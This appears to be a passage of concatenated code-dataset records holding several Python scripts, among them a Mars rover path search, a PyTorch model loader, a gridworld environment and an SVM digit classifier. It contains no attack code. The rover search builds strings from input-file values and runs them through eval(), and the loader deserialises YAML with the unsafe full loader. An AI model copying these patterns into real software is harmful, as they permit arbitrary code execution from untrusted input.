range(len(records)):\n if(len(records[idx].seq) < len(records[minIdx].seq)):\n minIdx = idx\n\nprint(recordsOut[minIdx])","repo_name":"qedrohenrique/exercises","sub_path":"Rosalind/FRMT.py","file_name":"FRMT.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3476037228","text":"import queue\nimport operator\n\n\"\"\"Consist of x and y co-ordinates of a particular location\"\"\"\n\n\nclass Node:\n\n # constructor\n def 
__init__(self, x, y):\n self.x = x\n self.y = y\n\n def __repr__(self):\n return str(self.x) + \",\" + str(self.y)\n\n def __eq__(self, other):\n if other is not None:\n return str(self.x) == str(other.x) and str(self.y) == str(other.y)\n return False # a node is never equal to None\n\n def __ne__(self, other):\n if other is not None:\n return str(self.x) != str(other.x) or str(self.y) != str(other.y)\n return True\n\n def __cmp__(self, other):\n return str(self.x) == str(other.x) and str(self.y) == str(other.y)\n\n def __hash__(self):\n return (hash(self.x)) + (2 * hash(self.y))\n\n # is_valid_location checks if a particular location is within the search space\n def is_valid_location(self, i, j, col, row):\n if 0 <= i < int(col) and 0 <= j < int(row):\n return True\n return False\n\n # returns the cell to the north of the current cell\n def get_north(self, col, row):\n if self.is_valid_location(self.x, self.y - 1, col, row):\n return Node(self.x, self.y - 1)\n return None\n\n # returns the cell to the north east of the current cell\n def get_north_east(self, col, row):\n if self.is_valid_location(self.x + 1, self.y - 1, col, row):\n return Node(self.x + 1, self.y - 1)\n return None\n\n # returns the cell to the north west of the current cell\n def get_north_west(self, col, row):\n if self.is_valid_location(self.x - 1, self.y - 1, col, row):\n return Node(self.x - 1, self.y - 1)\n return None\n\n # returns the cell to the west of the current cell\n def get_west(self, col, row):\n if self.is_valid_location(self.x - 1, self.y, col, row):\n return Node(self.x - 1, self.y)\n return None\n\n # returns the cell to the south west of the current cell\n def get_south_west(self, col, row):\n if self.is_valid_location(self.x - 1, self.y + 1, col, row):\n return Node(self.x - 1, self.y + 1)\n return None\n\n # returns the cell to the south of the current cell\n def get_south(self, col, row):\n if self.is_valid_location(self.x + 1, self.y, col, row):\n return Node(self.x + 1, self.y)\n return None\n\n # returns the cell to the south east of the current cell\n def get_south_east(self, col, row):\n if self.is_valid_location(self.x + 1, self.y + 1, col, row):\n return Node(self.x + 1, self.y + 1)\n return None\n\n # returns the cell to the east of the current cell\n def get_east(self, col, row):\n if self.is_valid_location(self.x, self.y + 1, col, row):\n return Node(self.x, self.y + 1)\n return None\n\n\n\"\"\"Implements the required algorithm and finds the best path from the landing site to the target sites\"\"\"\n\n\nclass Search:\n actions = {\"north\": \"get_north\", \"east\": \"get_east\", \"south\": \"get_south\", \"west\": \"get_west\",\n \"north_east\": \"get_north_east\", \"north_west\": \"get_north_west\", \"south_east\": \"get_south_east\",\n \"south_west\": \"get_south_west\"}\n\n # constructor\n def __init__(self, type_of_search, landing_site, target_sites, state, max_z_elevation, col, row):\n self.type_of_search = type_of_search\n self.landing_site = landing_site\n self.target_sites = target_sites\n self.state = state\n self.max_z_elevation = max_z_elevation\n self.col = col\n self.row = row\n\n def __repr__(self):\n return \"Type of search: \" + str(self.type_of_search) + \" Landing Site: \" + str(\n self.landing_site) + \" Target sites: \" + \\\n str(self.target_sites) + \" Max Z elevation:\" + str(self.max_z_elevation)\n\n # checks if the given site is equal to the target site\n def goal_test(self, curr_site, target_site):\n return curr_site == target_site\n\n # checks if the action is diagonal movement from one cell to 
the other\n def is_move_diagonal(self, action):\n return action == \"north_east\" or action == \"north_west\" or action == \"south_east\" or action == \"south_west\"\n\n def find_route(self, target_site):\n path = []\n if self.type_of_search == \"BFS\":\n path = self.bfs(target_site)\n if self.type_of_search == \"UCS\":\n path = self.ucs(target_site)\n if self.type_of_search == \"A*\":\n path = self.a_star(target_site)\n return path\n\n # forms the route from landing sie to target site\n def form_route(self, child_parent_dict, target_site):\n # list to store the entire path\n route = []\n present_site = target_site\n # append the site locations to the list as long as the site whose parent is landing site is found\n while present_site != self.landing_site:\n route.append(present_site)\n present_site = child_parent_dict[present_site]\n route.append(self.landing_site)\n # reverse the list\n route = route[::-1]\n return route\n\n # BFS Algorithm\n def bfs(self, target_site):\n # FIFO queue to push the locations of visited cells and pop the one by one\n frontier = queue.deque()\n\n # list to keep a track of all the locations visited\n explored = []\n\n # dictionary to store the parent cell location for each cell location\n child_parent_dict = {}\n\n # check if landing and target site is same\n if self.goal_test(self.landing_site, target_site):\n final_path = self.form_route(None, self.landing_site)\n return final_path\n\n frontier.append(self.landing_site)\n\n while True:\n if not frontier:\n return \"FAIL\"\n current_site = frontier.popleft()\n explored.append(current_site)\n for action in self.actions:\n site = eval(\n \"current_site\" + \".\" + self.actions.get(action) + \"(\" + self.col + \", \" + self.row + \")\")\n\n # check if the rover is allowed to move from the current cell to the child cell\n if site is not None and abs(\n int(self.state[site.y][site.x]) - int(self.state[current_site.y][current_site.x])) <= int(\n self.max_z_elevation):\n if site not in explored and site not in frontier:\n if self.goal_test(site, target_site):\n child_parent_dict[site] = current_site\n final_path = self.form_route(child_parent_dict, site)\n return final_path\n frontier.append(site)\n child_parent_dict[site] = current_site\n\n # UCS Algorithm\n def ucs(self, target_site):\n # dictionary to store the cell location and path cost from landing site\n priority_frontier = {self.landing_site: 0}\n\n # list to keep a track of all the visited cells\n explored = []\n\n # dictionary to store parent location for each cell\n child_parent_dict = {}\n\n # dictionary to maintain all the cell locations with path cost from landing site\n site_path_cost = {self.landing_site: 0}\n\n while True:\n if not priority_frontier:\n return \"FAIL\"\n\n # sort the priority queue by path cost\n sites_sorted_by_path_cost = sorted(priority_frontier.items(), key=operator.itemgetter(1))\n\n # pop the cell location with lowest path cost\n current_site = sites_sorted_by_path_cost[0][0]\n del priority_frontier[current_site]\n\n if self.goal_test(current_site, target_site):\n final_path = self.form_route(child_parent_dict, current_site)\n return final_path\n\n explored.append(current_site)\n\n for action in self.actions:\n site = eval(\"current_site\" + \".\" + self.actions.get(action) + \"(\" + self.col + \", \" + self.row + \")\")\n if site is not None:\n if site not in explored and site not in priority_frontier:\n if abs(int(self.state[site.y][site.x]) - int(self.state[current_site.y][current_site.x])) <= \\\n 
int(self.max_z_elevation):\n child_parent_dict[site] = current_site\n if self.is_move_diagonal(action):\n site_path_cost[site] = site_path_cost.get(current_site) + 14\n priority_frontier[site] = site_path_cost.get(site)\n else:\n site_path_cost[site] = site_path_cost.get(current_site) + 10\n priority_frontier[site] = site_path_cost.get(site)\n\n # If cell is visited check if current path cost for that cell is less than path cost associated\n # with it previously If yes, associate this new value to the cell. Change its parent to the\n # current site\n else:\n if self.is_move_diagonal(action):\n if priority_frontier.get(site) > site_path_cost.get(current_site) + 14:\n child_parent_dict[site] = current_site\n priority_frontier[site] = site_path_cost.get(current_site) + 14\n site_path_cost[site] = site_path_cost.get(current_site) + 14\n else:\n if priority_frontier.get(site) > site_path_cost.get(current_site) + 10:\n child_parent_dict[site] = current_site\n priority_frontier[site] = site_path_cost.get(current_site) + 10\n site_path_cost[site] = site_path_cost.get(current_site) + 10\n\n # A* Search Algorithm\n def a_star(self, target_site):\n # Heuristic used: Diagonal Distance\n\n diagonal_distance = max(\n (abs(int(self.landing_site.x) - int(target_site.x))), (abs(int(self.landing_site.y) - int(target_site.y))),\n abs(int(self.state[self.landing_site.y][self.landing_site.x]) - int(\n self.state[int(target_site.y)][int(target_site.x)])))\n\n # dictionary to store sites with their f(n) = g(n) + h(n) values\n priority_frontier = {self.landing_site: 0 + diagonal_distance}\n\n # list to keep track of visited sites\n explored = []\n\n # dictionary to store parent location of each cell\n child_parent_dict = {}\n\n # dictionary to maintain all the cell locations with f(n)\n site_path_cost = {self.landing_site: 0 + diagonal_distance}\n\n while True:\n if not priority_frontier:\n return \"FAIL\"\n\n # sort the priority queue by path cost\n sites_sorted_by_path_cost = sorted(priority_frontier.items(), key=operator.itemgetter(1))\n\n # pop the cell location with lowest path cost\n current_site = sites_sorted_by_path_cost[0][0]\n del priority_frontier[current_site]\n\n if self.goal_test(current_site, target_site):\n final_path = self.form_route(child_parent_dict, current_site)\n return final_path\n\n explored.append(current_site)\n\n for action in self.actions:\n site = eval(\"current_site\" + \".\" + self.actions.get(action) + \"(\" + self.col + \", \" + self.row + \")\")\n if site is not None:\n if site not in explored and site not in priority_frontier:\n if abs(int(self.state[site.y][site.x]) - int(self.state[current_site.y][current_site.x])) <= \\\n int(self.max_z_elevation):\n # calculate diagonal distance between site and target site\n heuristic = max(\n (abs(int(site.x) - int(target_site.x))), (abs(int(site.y) - int(target_site.y))),\n abs(int(self.state[site.y][site.x]) - int(\n self.state[int(target_site.y)][int(target_site.x)])))\n z_elevation_diff = abs(int(self.state[site.y][site.x]) - int(\n self.state[int(target_site.y)][int(target_site.x)]))\n child_parent_dict[site] = current_site\n if self.is_move_diagonal(action):\n site_path_cost[site] = (site_path_cost.get(\n current_site) + 14 + z_elevation_diff) + heuristic\n priority_frontier[site] = site_path_cost.get(site)\n else:\n site_path_cost[site] = (site_path_cost.get(\n current_site) + 10 + z_elevation_diff) + heuristic\n priority_frontier[site] = site_path_cost.get(site)\n\n # If cell is visited check if current f(n) for that cell is less 
than f(n) associated with it\n # previously. If yes, associate this new value to the cell. Change its parent to the current site\n else:\n # calculate diagonal distance between site and target site\n heuristic = max(\n (abs(int(site.x) - int(target_site.x))), (abs(int(site.y) - int(target_site.y))),\n abs(int(self.state[site.y][site.x]) - int(\n self.state[int(target_site.y)][int(target_site.x)])))\n\n z_elevation_diff = abs(\n int(self.state[site.y][site.x]) - int(self.state[int(target_site.y)][int(target_site.x)]))\n\n if self.is_move_diagonal(action):\n if priority_frontier.get(site) > (\n site_path_cost.get(current_site) + 14 + z_elevation_diff) + heuristic:\n child_parent_dict[site] = current_site\n site_path_cost[site] = (site_path_cost.get(\n current_site) + 14 + z_elevation_diff) + heuristic\n priority_frontier[site] = site_path_cost.get(site)\n else:\n if priority_frontier.get(site) > (\n site_path_cost.get(current_site) + 10 + z_elevation_diff) + heuristic:\n child_parent_dict[site] = current_site\n site_path_cost[site] = (site_path_cost.get(\n current_site) + 10 + z_elevation_diff) + heuristic\n priority_frontier[site] = site_path_cost.get(site)\n\n\n# open the input file to read the input\ninput_file = open(\"input.txt\")\n\n# search_type would store the type of algorithm to be implemented\nsearch_type = input_file.readline().strip()\n\n# width and height would store the size of the search space\nwidth, height = input_file.readline().split()\n\n# store the x and y location of the landing site\nx_loc_of_landing_site, y_loc_of_landing_site = input_file.readline().split()\n\n# start_site of type Node would store the location of landing site\nstart_site = Node(int(x_loc_of_landing_site), int(y_loc_of_landing_site))\n\n# store the maximum allowable z elevation differences to be able to travel from one site to another\nz_elevation = input_file.readline().strip()\n\n# store the number of sites to find path to\nno_of_target_sites = input_file.readline().strip()\n\n# all_target_sites is a list to store the locations of all the target sites\nall_target_sites = []\n\n# add each location to all_target_sites\nfor i in range(int(no_of_target_sites)):\n x, y = input_file.readline().split()\n n = Node(x, y)\n all_target_sites.append(n)\n\n# search_space stores the elevation values for each site\nsearch_space = [line.split() for line in input_file.readlines()]\n\n# create an object of type Search\ns = Search(search_type, start_site, all_target_sites, search_space, z_elevation, width, height)\n\n# final_route is a list that stores the paths for all the target sites\nfinal_route = []\n\n# create an output file to write the output\noutput_file = open(\"output.txt\", 'w')\n\n# store the path for each target site in final_route and write it to the output file\nfor i in range(int(no_of_target_sites)):\n final_route = s.find_route(all_target_sites[i])\n if final_route != \"FAIL\":\n for j in range(len(final_route)):\n output_file.write(str(final_route[j]) + \" \")\n output_file.write(\"\\n\")\n else:\n output_file.write(str(final_route) + \"\\n\")\n\n# close the input and output files\noutput_file.close()\ninput_file.close()","repo_name":"SayaliLagad2706/Mars-Rover","sub_path":"mars_rover.py","file_name":"mars_rover.py","file_ext":"py","file_size_in_byte":17023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20434112044","text":"# fibonacci numbers\n# Formula: F(n) = F(n-1) + F(n-2)\n\ndef fibonacci(num):\n Fn1 = 0\n Fn2 = 1\n for x in 
range(num):\n yield Fn1\n temp = Fn1\n Fn1 = Fn2\n Fn2 = temp + Fn2\n\n\nfor x in fibonacci(21):\n print(x)\n","repo_name":"ZenpaiCodes/Learning-code","sub_path":"Zero_to_Master/PROJECTS/small_PROJECTS/fibonacci numbers.py","file_name":"fibonacci numbers.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35878117407","text":"#!/usr/bin/env python3\n\nimport re\nfrom pathlib import Path\nimport importlib\nimport yaml\nimport jsonschema\nimport torch\nfrom torch import nn\n\n\n_ENCODER_KWARGS_SCHEMA = {\n 'type': 'object',\n 'required': [\n 'dimension',\n 'num_heads',\n 'dim_feedforward',\n 'num_layers',\n 'activation_function',\n 'dropout',\n 'checkpointing',\n ],\n 'properties': {\n 'dimension': {\n 'type': 'integer',\n 'minimum': 1,\n },\n 'num_heads': {\n 'type': 'integer',\n 'minimum': 1,\n },\n 'dim_feedforward': {\n 'type': 'integer',\n 'minimum': 1,\n },\n 'num_layers': {\n 'type': 'integer',\n 'minimum': 1,\n },\n 'activation_function': {\n 'type': 'string',\n 'enum': [\n 'relu',\n 'gelu',\n ],\n },\n 'dropout': {\n 'type': 'number',\n 'minimum': 0.0,\n 'exclusiveMaximum': 1.0,\n },\n 'checkpointing': {\n 'type': 'boolean',\n },\n },\n 'additionalProperties': False,\n}\n\n\n_DECODER_KWARGS_SCHEMA = {\n 'type': 'object',\n 'required': [\n 'dimension',\n 'dim_final_feedforward',\n 'activation_function',\n 'dropout',\n ],\n 'properties': {\n 'dimension': {\n 'type': 'integer',\n 'minimum': 1,\n },\n 'dim_final_feedforward': {\n 'type': 'integer',\n 'minimum': 1,\n },\n 'activation_function': {\n 'type': 'string',\n 'enum': [\n 'relu',\n 'gelu',\n ],\n },\n 'dropout': {\n 'type': 'number',\n 'minimum': 0.0,\n 'exclusiveMaximum': 1.0,\n },\n },\n 'additionalProperties': False\n}\n\n\n_ENCODER_DECODER_SNAPSHOTS_CONFIG_SCHEMA = {\n 'type': 'object',\n 'required': [\n 'encoder',\n 'decoder',\n 'model',\n ],\n 'properties': {\n 'encoder': {\n 'type': 'object',\n 'required': [\n 'module',\n 'class',\n 'kwargs',\n 'snapshot',\n ],\n 'properties': {\n 'module': {\n 'type': 'string',\n },\n 'class': {\n 'type': 'string',\n },\n 'kwargs': _ENCODER_KWARGS_SCHEMA,\n 'snapshot': {\n 'type': 'string',\n },\n },\n 'additionalProperties': False,\n },\n 'decoder': {\n 'type': 'object',\n 'required': [\n 'module',\n 'class',\n 'kwargs',\n 'snapshot',\n ],\n 'properties': {\n 'module': {\n 'type': 'string',\n },\n 'class': {\n 'type': 'string',\n },\n 'kwargs': _DECODER_KWARGS_SCHEMA,\n 'snapshot': {\n 'type': 'string',\n },\n },\n 'additionalProperties': False,\n },\n 'model': {\n 'type': 'object',\n 'required': [\n 'module',\n 'class',\n ],\n 'properties': {\n 'module': {\n 'type': 'string',\n },\n 'class': {\n 'type': 'string',\n },\n },\n 'additionalProperties': False,\n },\n },\n 'additionalProperties': False,\n}\n\n\n_MODEL_SNAPSHOT_CONFIG_SCHEMA = {\n 'type': 'object',\n 'required': [\n 'encoder',\n 'decoder',\n 'model',\n ],\n 'properties': {\n 'encoder': {\n 'type': 'object',\n 'required': [\n 'module',\n 'class',\n 'kwargs',\n ],\n 'properties': {\n 'module': {\n 'type': 'string',\n },\n 'class': {\n 'type': 'string',\n },\n 'kwargs': _ENCODER_KWARGS_SCHEMA,\n },\n 'additionalProperties': False,\n },\n 'decoder': {\n 'type': 'object',\n 'required': [\n 'module',\n 'class',\n 'kwargs',\n ],\n 'properties': {\n 'module': {\n 'type': 'string',\n },\n 'class': {\n 'type': 'string',\n },\n 'kwargs': _DECODER_KWARGS_SCHEMA,\n },\n 'additionalProperties': False,\n },\n 'model': {\n 'type': 
'object',\n 'required': [\n 'module',\n 'class',\n 'snapshot',\n ],\n 'properties': {\n 'module': {\n 'type': 'string',\n },\n 'class': {\n 'type': 'string',\n },\n 'snapshot': {\n 'type': 'string',\n },\n },\n 'additionalProperties': False,\n },\n },\n 'additionalProperties': False,\n}\n\n\n_MODEL_CONFIG_SCHEMA = {\n 'oneOf': [\n _ENCODER_DECODER_SNAPSHOTS_CONFIG_SCHEMA,\n _MODEL_SNAPSHOT_CONFIG_SCHEMA\n ]\n}\n\n\ndef load_model(config_path: Path) -> nn.Module:\n if not config_path.exists():\n raise RuntimeError(f'{config_path}: Does not exist.')\n if not config_path.is_file():\n raise RuntimeError(f'{config_path}: Not a file.')\n\n with open(config_path) as f:\n config = yaml.load(f, Loader=yaml.Loader)\n jsonschema.validate(config, _MODEL_CONFIG_SCHEMA)\n\n this_dir = config_path.parent\n\n encoder_config = config['encoder']\n encoder_module = importlib.import_module(encoder_config['module'])\n encoder_class = getattr(encoder_module, encoder_config['class'])\n encoder_instance = encoder_class(**encoder_config['kwargs'])\n\n decoder_config = config['decoder']\n decoder_module = importlib.import_module(decoder_config['module'])\n decoder_class = getattr(decoder_module, decoder_config['class'])\n decoder_instance = decoder_class(**decoder_config['kwargs'])\n\n model_config = config['model']\n model_module = importlib.import_module(model_config['module'])\n model_class = getattr(model_module, model_config['class'])\n model = model_class(encoder_instance, decoder_instance)\n\n if 'snapshot' in encoder_config:\n assert('snapshot' in decoder_config)\n encoder_config['snapshot'] = re.sub(\n '^\\\\./', str(this_dir) + '/', encoder_config['snapshot'])\n decoder_config['snapshot'] = re.sub(\n '^\\\\./', str(this_dir) + '/', decoder_config['snapshot'])\n encoder_instance.load_state_dict(torch.load(encoder_config['snapshot']))\n decoder_instance.load_state_dict(torch.load(decoder_config['snapshot']))\n else:\n assert('snapshot' in model_config)\n model_config['snapshot'] = re.sub(\n '^\\\\./', str(this_dir) + '/', model_config['snapshot'])\n model.load_state_dict(torch.load(model_config['snapshot']))\n\n return model\n","repo_name":"smly/kanachan","sub_path":"kanachan/training/bert/model_loader.py","file_name":"model_loader.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"72863275572","text":"import gym\nfrom .gym_minigrid.envs.human import HumanEnv\nfrom onpolicy.envs.gridworld.gym_minigrid.register import register\nimport numpy as np\nfrom icecream import ic\nfrom onpolicy.utils.multi_discrete import MultiDiscrete\n\nclass GridWorldEnv(object):\n def __init__(self, args):\n\n self.num_agents = args.num_agents\n self.scenario_name = args.scenario_name\n self.use_random_pos = args.use_random_pos\n self.agent_pos = None if self.use_random_pos else args.agent_pos\n self.num_obstacles = args.num_obstacles\n self.use_single_reward = args.use_single_reward\n self.use_discrect = args.use_discrect\n\n register(\n id=self.scenario_name,\n grid_size=args.grid_size,\n max_steps=args.max_steps,\n local_step_num=args.local_step_num,\n agent_view_size=args.agent_view_size,\n num_agents=self.num_agents,\n num_obstacles=self.num_obstacles,\n agent_pos=self.agent_pos,\n use_merge_plan=args.use_merge_plan,\n use_merge=args.use_merge,\n use_constrict_map=args.use_constrict_map,\n use_fc_net=args.use_fc_net,\n use_agent_id=args.use_agent_id,\n use_stack=args.use_stack,\n use_orientation=args.use_orientation,\n 
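# the remaining options below are passed straight through to the registered MultiExplorationEnv entry point\n 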
use_same_location=args.use_same_location,\n use_complete_reward=args.use_complete_reward,\n use_agent_obstacle=args.use_agent_obstacle,\n use_multiroom=args.use_multiroom,\n use_irregular_room=args.use_irregular_room,\n use_time_penalty=args.use_time_penalty,\n use_overlap_penalty=args.use_overlap_penalty,\n entry_point='onpolicy.envs.gridworld.gym_minigrid.envs:MultiExplorationEnv',\n astar_cost_mode=args.astar_cost_mode\n )\n\n self.env = gym.make(self.scenario_name)\n self.max_steps = self.env.max_steps\n # print(\"max step is {}\".format(self.max_steps))\n\n self.observation_space = self.env.observation_space\n self.share_observation_space = self.env.observation_space\n \n if self.use_discrect:\n self.action_space = [\n MultiDiscrete([[0, args.grid_size - 1],[0, args.grid_size - 1]])\n for _ in range(self.num_agents)\n ]\n else:\n self.action_space = [\n gym.spaces.Box(low=0.0, high=1.0, shape=(2,), dtype=np.float32)\n for _ in range(self.num_agents)\n ]\n\n def seed(self, seed=None):\n if seed is None:\n self.env.seed(1)\n else:\n self.env.seed(seed)\n\n def reset(self, choose=True):\n if choose:\n obs, info = self.env.reset()\n else:\n obs = [\n {\n 'image': np.zeros((self.env.width, self.env.height, 3), dtype='uint8'),\n 'direction': 0,\n 'mission': \" \"\n } for agent_id in range(self.num_agents)\n ]\n info = {}\n return obs, info\n\n def step(self, actions):\n if not np.all(actions == np.ones((self.num_agents, 1)).astype(int) * (-1.0)):\n obs, rewards, done, infos = self.env.step(actions)\n dones = np.array([done for agent_id in range(self.num_agents)])\n if self.use_single_reward:\n rewards = 0.3 * np.expand_dims(infos['agent_explored_reward'], axis=1) + 0.7 * np.expand_dims(\n np.array([infos['merge_explored_reward'] for _ in range(self.num_agents)]), axis=1)\n else:\n rewards = np.expand_dims(\n np.array([infos['merge_explored_reward'] for _ in range(self.num_agents)]), axis=1)\n else:\n obs = [\n {\n 'image': np.zeros((self.env.width, self.env.height, 3), dtype='uint8'),\n 'direction': 0,\n 'mission': \" \"\n } for agent_id in range(self.num_agents)\n ]\n rewards = np.zeros((self.num_agents, 1))\n dones = np.array([None for agent_id in range(self.num_agents)])\n infos = {}\n\n return obs, rewards, dones, infos\n\n def close(self):\n self.env.close()\n\n def get_short_term_action(self, input):\n outputs = self.env.get_short_term_action(input)\n return outputs\n\n def render(self, mode=\"human\", short_goal_pos=None):\n if mode == \"human\":\n self.env.render(mode=mode, short_goal_pos=short_goal_pos)\n else:\n return self.env.render(mode=mode, short_goal_pos=short_goal_pos)\n\n def ft_get_short_term_goals(self, args, mode=\"\"):\n mode_list = ['apf', 'utility', 'nearest', 'rrt', 'voronoi']\n assert mode in mode_list, (f\"frontier global mode should be in {mode_list}\")\n return self.env.ft_get_short_term_goals(args, mode=mode)\n\n def ft_get_short_term_actions(self, *args):\n return self.env.ft_get_short_term_actions(*args)\n","repo_name":"yang-xy20/async_mappo","sub_path":"onpolicy/envs/gridworld/GridWorld_Env.py","file_name":"GridWorld_Env.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"42971198265","text":"import cv2 as cv\nimport numpy as np\n\n\nWIDTH = 900\nHEIGHT = 900\nBORDER = 10\nimage_size = 28\ncolors = [(0, 0, 255), (0, 255, 0), (255, 0, 0), (255, 255, 0), (255, 0, 255), \\\n (0, 255, 255), (100, 100, 255), (255, 100, 255), (100, 255, 100), (255, 100, 
100)]\n\n###\n### Features\n###\n\n# Michael, Michael, and Will\n# Feature: top-heavy vs bottom-heavy \n# \"bottom-heavy\" means that there's more going on in the bottom of the picture/digit. \n# For example: 6 is bottom-heavy because there are more transitions in the bottom of the digit.\n# \"top-heavy\" means that there's more going on in the top of the picture/digit. \n# For example: 4 and 9 are top-heavy as there are more transitions in the top of the digit\n# Returns a list with the top-weight and bottom-weight as (top, bottom)\ndef top_bottom_balance(img):\n # Get the number of color transitions per row in the image\n transition_array = color_transition_array(img)\n midpoint = len(transition_array)//2 #Get the midpoint of the array\n # Split the transition array into top and bottom of the image\n top_array = transition_array[:midpoint]\n bottom_array = transition_array[midpoint:]\n # Sum the values for number of color transitions in the top and bottom of the picture\n top_value = np.sum(top_array)\n bottom_value = np.sum(bottom_array)\n return [top_value, bottom_value]\n\n# Michael, Michael, and Will\n# Split the image in half and compare the weights\n# (# of color transitions, can be easily modified to do sum of non-white\n# pixel values) of the two halves.\n# The function returns a tuple in the form (top_half, bottom_half), \n# with the bigger number representing which part of the image has more going on\n# Returns a single array with the number of color transistions per row, \n# corresponding to that index in the returned array\ndef color_transition_array(img): \n img2 = img.copy()\n img2[img2 > 0] = 255 # Any pixel not white becomes black\n return (np.sum(abs(img2[:, 1:] - img2[:, :-1])/255, axis=1))\n\n\n\n\n\"\"\"\n Admin Functions\n\"\"\"\n# Read from our file\ndef read_images(filename):\n data = np.loadtxt(filename, delimiter=\",\", dtype='int')\n return data\n\n\n# Dictionary to map each digit to its list of images\ndef make_digit_map(data):\n digit_map = {i:[] for i in range(10)}\n for row in data:\n digit_map[row[0]].append(row[1:].reshape((image_size, image_size)))\n return digit_map\n\n\n# Extract features\n# fnlist is a list of feature-generating functions, each of which should\n# take a 28x28 grayscale (0-255) image, 0=white, and return a 1-d array\n# of numbers\n# Returns a map: digit -> nparray of feature vectors, one row per image\ndef build_feature_map(digit_map, fnlist):\n fmap = {i:[] for i in range(10)}\n for digit in fmap:\n for img in digit_map[digit]:\n feature_vector = []\n for f in fnlist:\n feature_vector += f(img)\n fmap[digit].append(feature_vector)\n return fmap\n\n\n# Set up training data\ndata = read_images(\"data/mnist_medium.csv\")\ndigit_map = make_digit_map(data)\nfeature_map = build_feature_map(digit_map, [top_bottom_balance])\ntrain = []\nlabels = []\nprint(feature_map)\nfor digit in range(10):\n print(digit, len(feature_map[digit]))\n for f in feature_map[digit]:\n train.append(f)\n labels.append(digit)\n\n# Train the SVM\nsvm = cv.ml.SVM_create()\nsvm.setType(cv.ml.SVM_C_SVC)\nsvm.setKernel(cv.ml.SVM_LINEAR)\n#svm.setKernel(cv.ml.SVM_RBF)\nsvm.setTermCriteria((cv.TERM_CRITERIA_MAX_ITER, 100, 1e-6))\nsvm.train(np.array(train).astype(np.float32), cv.ml.ROW_SAMPLE, np.array(labels))\n\n\n# Data for visual representation\nmaxx, maxy = np.max(train, axis=0)\n\nimage = np.ones((HEIGHT, WIDTH, 3), dtype=np.uint8)*255\n# Show the training data\nfor i in range(len(train)):\n y, x = int(train[i][1] * (HEIGHT-BORDER) / maxy) - BORDER, int(train[i][0] * 
(WIDTH-BORDER) / maxx) - BORDER\n color = colors[labels[i]]\n cv.circle(image, (x, y), 5, color, -1)\n\n\nfor i in range(0, image.shape[0], 2):\n for j in range(0, image.shape[1], 2):\n tx = (j + BORDER)*maxx*1.0 / (WIDTH - BORDER)\n ty = (i + BORDER)*maxy*1.0 / (WIDTH - BORDER)\n sampleMat = np.matrix([[tx, ty]], dtype=np.float32)\n response = int(svm.predict(sampleMat)[1][0])\n image[i,j] = colors[response]\n\ncv.imshow('SVM Simple Example', image) # show it to the user\ncv.waitKey()\n\n\n\n\n","repo_name":"gabriellasanford/2020Vision","sub_path":"svm1.py","file_name":"svm1.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72204088373","text":"# encoding: utf-8\n\nimport os\nimport pandas as pd\nimport codecs\nimport re\n\n\ndirname = os.path.dirname(__file__)\nfilepath = os.path.join(dirname, '..', 'src', 'assets', 'timeline')\nprint(filepath)\n\n\ndef write_timeline(input_file):\n name = os.path.basename(input_file).split('.csv')[0]\n out = codecs.open(os.path.join(\n filepath, '{}.ts'.format(name)), 'wb', encoding='utf-8')\n print(os.path.join(filepath, '{}.ts'.format(name)))\n # start_time = '4:59'\n input_file = os.path.join(filepath, input_file)\n\n # file head\n out.write(\n r'import { ITimelineCastTime } from \"@/assets/timeline/type\";'+'\\n')\n\n out.write(\n f'export const {name}: Record = {{}};\\n\\n\\n')\n x = pd.read_csv(input_file, header=None).values.tolist()\n\n i = 'a'\n\n for line in x:\n skill_name = line[0]\n time = line[1]\n minute, second = translate1_time(time)\n outline = f'{name}.{i} = {{ name: \\\"{skill_name}\\\", time: {{minute: {str(minute)}, second: {str(second)}}}, castTime: 3 }};\\n'\n out.write(outline)\n if i[-1] == 'z':\n i = len(i)*'a' + 'a'\n else:\n i = (len(i)-1)*'a'+chr(ord(i[-1])+1)\n outline = f'{name}.break = {{ name: \\\"BREAK\\\", time: {{minute: {str(0)}, second: {str(0)}}}, castTime: 8 }};\\n'\n out.write(outline)\n out.write(f'\\nObject.freeze({name});\\n')\n\n\ndef translate_time(start_time, end_time):\n start_min, start_sec = [int(x) for x in start_time.split(':')[:2]]\n end_min, end_sec = [int(x) for x in end_time.split(':')[:2]]\n if start_sec >= end_sec:\n sec_dif = start_sec - end_sec\n min_dif = start_min - end_min\n else:\n sec_dif = start_sec+60 - end_sec\n min_dif = start_min - end_min - 1\n return min_dif*60 + sec_dif\n\n\ndef translate1_time(time):\n end_min, end_sec = [int(x) for x in time.split(':')[:2]]\n return end_min, end_sec\n\n\ndef main():\n for file in os.listdir(filepath):\n if file.split('.')[-1] == 'csv':\n write_timeline(file)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NyxSLY/dragalia-dbm","sub_path":"scripts/generate-timeline.py","file_name":"generate-timeline.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74880782771","text":"# For converting Speech to text\nimport speech_recognition as sr\n\n# For converting text to Speech\nimport pyttsx3 as tts\n\n# Use for playing music by using google\nimport pywhatkit as kit\n\n# Current Date And Time\nimport datetime as dt\n\n# Find a result from wikipedia\nimport wikipedia as wiki\n\n# Randomly get a joke\nimport pyjokes as pj\n\nimport os\n\nimport subprocess\n\nimport webbrowser\n\n#tkinter is a GUI of python\nfrom tkinter import *\nfrom PIL import ImageTk,Image\n\n\nlistener = sr.Recognizer()\nSpeaker = tts.init()\n\n# Change Voices 0 for 
